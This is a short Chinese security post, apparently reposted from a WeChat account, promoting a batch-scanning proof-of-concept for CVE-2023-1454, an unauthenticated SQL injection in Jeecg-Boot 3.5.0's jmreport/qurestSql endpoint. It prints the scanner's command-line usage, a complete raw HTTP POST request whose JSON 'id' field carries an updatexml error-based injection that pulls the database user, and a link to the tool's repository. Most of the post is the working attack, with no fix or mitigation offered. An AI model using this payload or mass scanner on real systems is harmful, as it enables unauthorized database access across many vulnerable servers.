关注我们 | 发现更多精彩内容
jmreport/qurestSql 未授权SQL注册批量扫描poc Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注进入漏洞。
用法
usage: CVE-2023-1454.py [-h] [-u URL] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT] [-p PROXY]optional arguments:-h, --help show this help message and exit-u URL, --url URL Target url(e.g. url.txt)-f FILE, --file FILE Target file(e.g. url.txt)-t THREAD, --thread THREADNumber of thread (default 5)-T TIMEOUT, --timeout TIMEOUTRequest timeout (default 3)-o OUTPUT, --output OUTPUTVuln url output file (e.g. result.txt)-p PROXY, --proxy PROXYRequest Proxy (e.g http://127.0.0.1:8080)
poc:
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/json;charset=UTF-8Content-Length: 128{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
项目地址:
https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247499178&idx=4&sn=ad34ebba443bad30d84ed49f97f7f31b&chksm=9badb4e1acda3df73a1397b41614d1723c9f1dace1fb51e1ac77ce96c625480a3b79269139bb#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh